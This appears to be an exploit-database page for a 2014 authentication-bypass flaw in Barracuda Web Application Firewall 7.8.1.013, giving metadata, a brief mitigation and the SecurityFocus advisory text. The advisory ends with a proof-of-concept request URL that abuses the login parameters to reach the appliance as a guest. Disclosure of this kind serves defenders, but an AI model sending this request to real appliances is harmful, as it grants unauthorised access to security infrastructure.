header-logo
Suggest Exploit
vendor:
Barracuda Web Application Firewall
by:
SecurityFocus
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Barracuda Web Application Firewall
Affected Version From: 7.8.1.013
Affected Version To: 7.8.1.013
Patch Exists: YES
Related CWE: N/A
CPE: a:barracuda_networks:barracuda_web_application_firewall
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Barracuda Web Application Firewall Authentication Bypass Vulnerability

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Mitigation:

Ensure that the authentication mechanism is properly configured and that all users have strong passwords.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/69028/info

Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.

Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest